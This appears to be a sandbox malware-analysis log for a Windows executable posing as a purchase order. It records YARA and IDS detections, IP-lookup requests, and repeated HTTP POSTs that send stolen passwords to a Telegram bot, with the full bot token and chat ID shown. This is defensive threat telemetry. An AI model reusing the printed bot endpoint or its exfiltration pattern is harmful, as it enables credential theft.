Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50136 version: TLS 1.2

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0B889D1Dh	0_2_0B889516
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0B889D1Dh	0_2_0B889569
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0273F475h	4_2_0273F2D8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0273F475h	4_2_0273F4C4
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0273FC31h	4_2_0273F98C
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05357EB5h	4_2_05357B78
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05359280h	4_2_05358FB0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535C826h	4_2_0535C558
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05350FF1h	4_2_05350D48
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535E816h	4_2_0535E548
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05351449h	4_2_053511A0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 053518A1h	4_2_053515F8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535CCB6h	4_2_0535C9E8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535ECA6h	4_2_0535E9D8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 053562D9h	4_2_05356030
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535BF06h	4_2_0535BC38
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535DEF6h	4_2_0535DC28
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 053532B1h	4_2_05353008
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05353709h	4_2_05353460
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 053502E9h	4_2_05350040
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535E386h	4_2_0535E0B8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then mov esp, ebp	4_2_0535B090
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05350741h	4_2_05350498
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then mov esp, ebp	4_2_0535B081
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05356733h	4_2_05356488
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05350B99h	4_2_053508F0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535C396h	4_2_0535C0C8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 053579C9h	4_2_05357720
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 053555D1h	4_2_05355328
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535B5E6h	4_2_0535B318
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 053525A9h	4_2_05352300
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535D5D6h	4_2_0535D308
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05352A01h	4_2_05352758
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05352E59h	4_2_05352BB0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535BA76h	4_2_0535B7A8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535DA66h	4_2_0535D798
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05355A29h	4_2_05355780
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535FA56h	4_2_0535F788
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05355E81h	4_2_05355BD8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 053548C9h	4_2_05354620
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05356CC1h	4_2_05356A18
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05357119h	4_2_05356E70
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05354D21h	4_2_05354A78
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535D146h	4_2_0535CE78
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535F136h	4_2_0535EE68
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05351CF9h	4_2_05351A50
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05352151h	4_2_05351EA8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 0535F5C6h	4_2_0535F2F8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05355179h	4_2_05354ED0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4x nop then jmp 05357571h	4_2_053572C8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2017/12/2024%20/%2015:46:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f358331f29dHost: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd209fbe2647ccHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20cf8d16151bHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20fb68695da8Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21311e408dc9Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd216cdca9611fHost: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21b60195c746Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2201535bf242Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22651478ebb6Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22b575741c71Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd232ee45a716cHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23bf4fc551b0Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24569962d1a7Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24e9b84a7521Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd257981da6897Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd261610f8ea3aHost: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd269d6eebb803Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd273af9796484Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd27d1a9bd81efHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2a320255e51fHost: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2caa9038df06Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2d63b3185ce7Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2fc9ba88ec0fHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd30609e76b5a6Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31135be8a6fdHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31c275b6509aHost: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32858bb2d8adHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd334532b593f8Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33cd13cbab4bHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3477b07939abHost: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd354553ed73c8Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd365c0748ebc1Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd92e3d7cfdf0fHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8de0a0b8afb2742Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8fa8d1df6635287Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1daa2fe4a239Host: api.telegram.orgContent-Length: 581

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 172.67.177.134:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
